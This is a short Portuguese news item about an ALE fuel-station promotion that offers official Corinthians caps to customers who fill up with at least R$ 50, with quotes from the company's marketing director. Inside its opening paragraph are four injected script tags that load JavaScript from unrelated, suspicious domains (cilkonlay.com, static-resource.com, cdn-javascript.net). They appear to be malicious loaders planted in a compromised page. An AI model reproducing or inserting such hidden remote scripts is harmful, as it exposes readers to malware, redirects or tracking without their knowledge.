Promoção

ALE Combustíveis faz promo com produto personalizado do Corinthians

Clientes que abastecerem na ALE, patrocinadora do time paulista, poderão levar para casa um boné oficial do Timão. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573685148244" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Clientes que abastecerem na ALE, patrocinadora do time paulista, poderão levar para casa um boné oficial do Timão.

Os torcedores do Corinthians agora têm um novo motivo para abastecer nos postos da Rede ALE. A distribuidora de combustíveis deu início a mais uma ação promocional com produtos personalizados do time.

As melhores promoções você encontra aqui.

Leia também: ALE leva “O Maior Torcedor do Mundo” à Arena Corinthians.

Na ação “Corinthians na Cabeça”, clientes poderão levar para casa um boné oficial do Timão. A promoção é válida enquanto durarem os estoques e a lista de postos participantes está disponível no site.

Os consumidores que abastecerem a partir de R$ 50 nos postos participantes terão acesso a um boné oficial do time pelo valor especial de R$ 24,99. “O objetivo da ação, voltada para os consumidores, é levar a paixão pelo Timão, clube que tem uma torcida imensa espalhada pelo país, para dentro dos nossos postos, que também têm abrangência nacional. Essa ação exclusiva para o torcedor corintiano, com certeza, vai proporcionar ainda mais visibilidade para a nossa marca, além de ser uma importante ação de relacionamento com os clientes dos postos.”, afirma o diretor de Marketing e Varejo da ALE, Diego Pires.

Não haverá limite de participação, desde que o valor abastecido pelo cliente seja acima de R$ 50. Será considerado um cupom por boné, não sendo permitido juntar comprovantes de abastecimento em valores inferiores.

A iniciativa reforça o investimento da companhia em marketing esportivo e tem o objetivo de valorizar a parceria com o Sport Club Corinthians Paulista. “Com um contrato até março de 2020, o patrocínio da ALE vai muito além da marca na camisa. Outras iniciativas também estão sendo desenvolvidas.”, afirma Diego Pires.